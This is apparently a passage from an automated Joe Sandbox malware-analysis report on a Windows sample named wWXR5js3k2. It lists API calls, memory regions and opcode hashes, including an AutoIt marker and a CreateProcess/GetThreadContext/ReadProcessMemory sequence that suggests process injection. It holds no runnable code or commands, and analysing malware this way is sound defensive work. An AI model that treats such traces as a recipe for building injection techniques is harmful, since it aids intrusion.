                                                      • Part of subcall function 00672D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00679A24), ref: 00672D69
                                                      • Part of subcall function 00672D55: GetLastError.KERNEL32(00000000,?,00679A24), ref: 00672D7B
                                                    • _free.LIBCMT ref: 006B8D2C
                                                    • _free.LIBCMT ref: 006B8D3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                    • Instruction ID: 690632bf4f0a53cf4f19f44888354fa2dcea06da304764f14889d2b8d733fb1a
                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                    • Instruction Fuzzy Hash: 63E012E16016024ACB74A679A950AD313DE8F98352714491EF40DD7286CE64FCC2C228
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    • Opcode ID: 57c44fb8aaf1d7ac04ecef4180b3c8f6f389de5272a0bf1f1e5a50de5872f560
                                                    • Instruction ID: 4dfdbbf7761e822fb718a1a4dbcccf1b9acee576887e415747d224ee55ac6372
                                                    • Opcode Fuzzy Hash: 57c44fb8aaf1d7ac04ecef4180b3c8f6f389de5272a0bf1f1e5a50de5872f560
                                                    • Instruction Fuzzy Hash: F2226B70508341DFDB24DF54C494A6ABBE2FF84305F148A6DE88A8B361D731ED49CB96
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00654834
                                                      • Part of subcall function 0067336C: __lock.LIBCMT ref: 00673372
                                                      • Part of subcall function 0067336C: DecodePointer.KERNEL32(00000001,?,00654849,006A7C74), ref: 0067337E
                                                      • Part of subcall function 0067336C: EncodePointer.KERNEL32(?,?,00654849,006A7C74), ref: 00673389
                                                      • Part of subcall function 006548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00654915
                                                      • Part of subcall function 006548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0065492A
                                                      • Part of subcall function 00653B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00653B68
                                                      • Part of subcall function 00653B3A: IsDebuggerPresent.KERNEL32 ref: 00653B7A
                                                      • Part of subcall function 00653B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,007152F8,007152E0,?,?), ref: 00653BEB
                                                      • Part of subcall function 00653B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00653C6F
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00654874
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    • Opcode ID: 144c1f4d18bb79995e3ba8bf69e0be527f61734a7ac6a3ed995542f3836f603b
                                                    • Instruction ID: 6eaf40f415ea615a6e2dfb0c15230d561f8005c60a36ee3fe61c5ffe732ae125
                                                    • Opcode Fuzzy Hash: 144c1f4d18bb79995e3ba8bf69e0be527f61734a7ac6a3ed995542f3836f603b
                                                    • Instruction Fuzzy Hash: 5111C071904351DFC700DF28E80594ABBE9FF98750F10C91EF845872B1DB748648CB99
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00655821,?,?,?,?), ref: 00655CC7
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00655821,?,?,?,?), ref: 0068DD73
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 1aaedf6027eea360f34c56e5aa4b84552a142d4fe4a445e85b98c7d80a232144
                                                    • Instruction ID: bbb9573ef6c871f8ef756986f912763795d4f4e15e3c949a399faac7bc396d9a
                                                    • Opcode Fuzzy Hash: 1aaedf6027eea360f34c56e5aa4b84552a142d4fe4a445e85b98c7d80a232144
                                                    • Instruction Fuzzy Hash: 58019670184748BEF3201E24CC9AFB637DDEB01769F108319BEE69A2E0C6B41C498B54
                                                    APIs
                                                      • Part of subcall function 0067571C: __FF_MSGBANNER.LIBCMT ref: 00675733
                                                      • Part of subcall function 0067571C: __NMSG_WRITE.LIBCMT ref: 0067573A
                                                      • Part of subcall function 0067571C: RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,00670DD3,?), ref: 0067575F
                                                    • std::exception::exception.LIBCMT ref: 00670DEC
                                                    • __CxxThrowException@8.LIBCMT ref: 00670E01
                                                      • Part of subcall function 0067859B: RaiseException.KERNEL32(?,?,?,00709E78,00000000,?,?,?,?,00670E06,?,00709E78,?,00000001), ref: 006785F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: 1a204cad0852e8d1f3d41443636d8b25d5c6399ba527aa4fb23eee0a774c0f25
                                                    • Instruction ID: 9ce49b4616bd3e9327d34d382199a39c2b5c33f79987ad459d6297d2457496b5
                                                    • Opcode Fuzzy Hash: 1a204cad0852e8d1f3d41443636d8b25d5c6399ba527aa4fb23eee0a774c0f25
                                                    • Instruction Fuzzy Hash: 6FF0A97154031EA6DB20EA95DC155DF7BAF9F01311F108459F90C96281DFF09E5095E5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    • Opcode ID: d95e8d7329e8ff7d90d80dae49f30bf2c874eafc8ac23bed065b6ec7e811dd09
                                                    • Instruction ID: 4ecabebd159c9339c87e6b5ce4f1cf81ac0ca79deef8b4f40228f9049ae55aa5
                                                    • Opcode Fuzzy Hash: d95e8d7329e8ff7d90d80dae49f30bf2c874eafc8ac23bed065b6ec7e811dd09
                                                    • Instruction Fuzzy Hash: A401F771C00A09EFCF62AF688C064DE7B63AF91321F40C159F82C5B2A1DB718A11DF95
                                                    APIs
                                                      • Part of subcall function 00678B28: __getptd_noexit.LIBCMT ref: 00678B28
                                                    • __lock_file.LIBCMT ref: 006753EB
                                                      • Part of subcall function 00676C11: __lock.LIBCMT ref: 00676C34
                                                    • __fclose_nolock.LIBCMT ref: 006753F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 609dc75a92d7394ba19fbe7c26a61b048d9eb95a8b4aa20f3dabd16a8d564643
                                                    • Instruction ID: 9d909ef768dbc1168b547239dea216483c77321aa96cda962b009899bb07d3ea
                                                    • Opcode Fuzzy Hash: 609dc75a92d7394ba19fbe7c26a61b048d9eb95a8b4aa20f3dabd16a8d564643
                                                    • Instruction Fuzzy Hash: F5F09671800B049ED751AB7998057AD77E26F41374F20C24CA42DAB1D1EFFC4D415B59
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 032D1A5B
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 032D1AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 032D1B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                    • Instruction ID: 3aceefd39997b56c50454dfaa152a5d8ff70a3d87d342f77a5c6d19c1c92a54b
                                                    • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                    • Instruction Fuzzy Hash: BB12DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5F91CB5A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ee97b539c5d9559412b2879bd17738f770cf935858750641b14ebac88ed1677
                                                    • Instruction ID: acefb1174474dbec54953167e19093b68636cfd36ce47b19ff688ec0c654570c
                                                    • Opcode Fuzzy Hash: 3ee97b539c5d9559412b2879bd17738f770cf935858750641b14ebac88ed1677
                                                    • Instruction Fuzzy Hash: F8518F31600604EFCF54EF68C9A5EAE77A7AF45310F1581ACF806AB392DA31ED05CB59
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00655B96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 330120b93221b7a6d265398b5c546d24cafe08be7ee576141ec4e43d2fcfbb1d
                                                    • Instruction ID: 3aa0a19e28ca8695c6d27b18aa5323a5475d9e0491d859b36ca0b64e679ee0ff
                                                    • Opcode Fuzzy Hash: 330120b93221b7a6d265398b5c546d24cafe08be7ee576141ec4e43d2fcfbb1d
                                                    • Instruction Fuzzy Hash: CA314D31A00A05AFCB18DF6CC4A8AADF7B6FF48321F148629DC1693750D770B994CB91
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: ef027ffadee96574861ef34879feb10645617295a361f1f4c7d3ec70e0d34700
                                                    • Instruction ID: e8dc8cc7147e7f87dcdb1fccf69220465413fbe5dc97ee2802162d89b739a54b
                                                    • Opcode Fuzzy Hash: ef027ffadee96574861ef34879feb10645617295a361f1f4c7d3ec70e0d34700
                                                    • Instruction Fuzzy Hash: 16412774604341CFDB14DF14C444B5ABBE2BF49319F0989ACE99A8B762C332E849CF52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5281ac648a44e9f301358fe957ebd07d634e8c437c758a8a874b8830b79bff63
                                                    • Instruction ID: 8071f21204a7c430200189b269ca3405b022d8047238b52eeb1402cd745e793c
                                                    • Opcode Fuzzy Hash: 5281ac648a44e9f301358fe957ebd07d634e8c437c758a8a874b8830b79bff63
                                                    • Instruction Fuzzy Hash: D721A23664C380BFE321CB24AC47FE27F66EB83760F14C49EF988568D1D1650966CBA5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 9d48f5ef4250c759ce462b19c74abd87c651414f6316fee0af764fc564ce5670
                                                    • Instruction ID: f5d45161022a0c6a3b7736d80b4875e11ed354c72b4e97973656c775d03d1b50
                                                    • Opcode Fuzzy Hash: 9d48f5ef4250c759ce462b19c74abd87c651414f6316fee0af764fc564ce5670
                                                    • Instruction Fuzzy Hash: A4212B71500A04EBDB10AF61E8456AA7BBEFF00311F21C66EE486D5050DBB494D0D769
                                                    APIs
                                                      • Part of subcall function 00654BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00654BEF
                                                      • Part of subcall function 0067525B: __wfsopen.LIBCMT ref: 00675266
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654E0F
                                                      • Part of subcall function 00654B6A: FreeLibrary.KERNEL32(00000000), ref: 00654BA4
                                                      • Part of subcall function 00654C70: _memmove.LIBCMT ref: 00654CBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: ee4d8804922f91b507b8e8d01564e0f940864839589728af8cc71b8a9ecd3135
                                                    • Instruction ID: 8686a1e0c0237e1a39ac9d154f326581f8483c0617ca96c3c6631e7cbe340921
                                                    • Opcode Fuzzy Hash: ee4d8804922f91b507b8e8d01564e0f940864839589728af8cc71b8a9ecd3135
                                                    • Instruction Fuzzy Hash: D0112731600205ABCF14BF70C803FAD77A7AF44745F10846DF942A7181DE719A899B64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: d1f8f123862a325a77a98127ce6aa27db8c72e821bf06e87630a17c56ebb0fe6
                                                    • Instruction ID: 0161a8b311c711c11783dccbbfd0b88c920263635fcb899d1e2c506b303517de
                                                    • Opcode Fuzzy Hash: d1f8f123862a325a77a98127ce6aa27db8c72e821bf06e87630a17c56ebb0fe6
                                                    • Instruction Fuzzy Hash: CF212574908302DFDB14DF64C444B5ABBE2BF88315F058A6CF88A57722D731E849CBA2
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,006556A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00655C16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 7eaf1c21f220819cd8c25ef7c7883ecb49b2a5268264fc0d77fd11462a92c0d3
                                                    • Instruction ID: 3b239db765f03f7347140ec84f3722eaa1e91c54fc66fcbfc63ae0cb1d97d89a
                                                    • Opcode Fuzzy Hash: 7eaf1c21f220819cd8c25ef7c7883ecb49b2a5268264fc0d77fd11462a92c0d3
                                                    • Instruction Fuzzy Hash: 4C113A75200B059FD3208F19C8A8BA6B7E6EF44761F10C92EE99B86A51D771E849CB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 37c3bb1f29870e84f0749f53f84cc2f20e31eb940535627f726d211e13bb0f16
                                                    • Instruction ID: 0f445635e36040174870d5a3d165e99d19edd09042c83fa0c2a0ded25f5f9e4c
                                                    • Opcode Fuzzy Hash: 37c3bb1f29870e84f0749f53f84cc2f20e31eb940535627f726d211e13bb0f16
                                                    • Instruction Fuzzy Hash: A1017CB5200A42AFC305EB68C455D26F7AAFF8A3107148569F819C7702DB35EC21CBE4
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 006748A6
                                                      • Part of subcall function 00678B28: __getptd_noexit.LIBCMT ref: 00678B28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 2f079344d85a71cef258a2405812345c3caeb190018816255ecc9a77eb55386a
                                                    • Instruction ID: 6c31ca9e1915eedb9e1436acc87a8db85658587eaefe440ac43e83c0f3cccf5e
                                                    • Opcode Fuzzy Hash: 2f079344d85a71cef258a2405812345c3caeb190018816255ecc9a77eb55386a
                                                    • Instruction Fuzzy Hash: CFF08C71940609EBDB91AFA4880E7EE36A2AF00325F15C518F42C9B291CF79C951DB56
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,007152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654E7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: a7f744f32945348ff980a0f4f835cfffadd7d7b94e6ee8ffd8c1cbca47c1a339
                                                    • Instruction ID: f26c3e124e5851d6ae0217822b567d76b799d88b5e698408dbb3b58269c87d81
                                                    • Opcode Fuzzy Hash: a7f744f32945348ff980a0f4f835cfffadd7d7b94e6ee8ffd8c1cbca47c1a339
